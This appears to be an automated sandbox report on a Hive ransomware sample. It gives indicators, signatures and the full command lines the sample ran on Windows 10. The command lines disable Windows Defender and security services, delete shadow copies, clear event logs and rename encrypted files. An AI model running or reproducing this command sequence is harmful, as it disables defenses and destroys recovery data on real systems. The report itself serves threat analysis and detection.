Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-vhc2csdddq
Target 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z
SHA256 ece6bccb64b3ea172b531008bdda7f24b0b28a193a67056a43689f852dfd9ddf
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Threat Level: Known bad

The file 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Modifies security service

Deletes Windows Defender Definitions

Hive

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Runs net.exe

Suspicious use of WriteProcessMemory

Runs ping.exe

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:59

Reported

2022-01-12 16:59

Platform

win7-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:59

Reported

2022-01-12 17:04

Platform

win10-en-20211208

Max time kernel

163s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 2832 wrote to memory of 4152 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4036 wrote to memory of 3080 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3980 wrote to memory of 4196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4188 wrote to memory of 4396 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4384 wrote to memory of 4436 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe

"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_1643c" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_1643c" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\notepad.exe

notepad.exe C:\iotb_HOW_TO_DECRYPT.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

C:\Windows\SysWOW64\PING.EXE

ping.exe -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 932fbbcec97a66cb6d8b534b3adcb522
SHA1 4b4e0903311f976910faf1ad20e79a1fd258d70e
SHA256 15a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101
SHA512 3e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5
